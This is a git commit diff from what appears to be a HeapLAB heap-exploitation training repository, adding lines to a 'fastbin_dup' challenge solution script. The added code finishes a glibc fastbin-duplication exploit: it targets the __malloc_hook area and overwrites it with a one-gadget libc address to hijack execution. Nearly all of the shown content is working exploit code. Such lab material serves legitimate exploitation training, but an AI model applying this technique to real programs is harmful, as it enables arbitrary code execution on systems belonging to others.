From 93f5247d9c37732846b0d88136b2ce1908b361be Mon Sep 17 00:00:00 2001
From: Brett Weiland <techcrazybsw@gmail.com>
Date: Mon, 4 Jan 2021 20:25:35 -0600
Subject: 	modified:   HeapLAB/challenge-fastbin_dup/.gdb_history        
 modified:   HeapLAB/challenge-fastbin_dup/bruh.py

---
 HeapLAB/challenge-fastbin_dup/bruh.py | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

(limited to 'HeapLAB/challenge-fastbin_dup/bruh.py')

diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 56b0c71..df54957 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -74,9 +74,14 @@ malloc(119, 'sdfg')
 
 #8 * 9
 
-payload_loc = libc.sym.__malloc_hook - 35
+payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing
 malloc(119, p64(0)*9 + p64(payload_loc))
 
+#we now have things in place and shit
+onegadget = libc.address + 0xe1fa1
+malloc(72, p64(0)*(35) + p64(onegadget))
+
+print("onegadget: {}".format(hex(onegadget)))
 print("top chunk addr: {}".format(hex(payload_loc)))
 
 # =============================================================================
-- 
cgit v1.2.3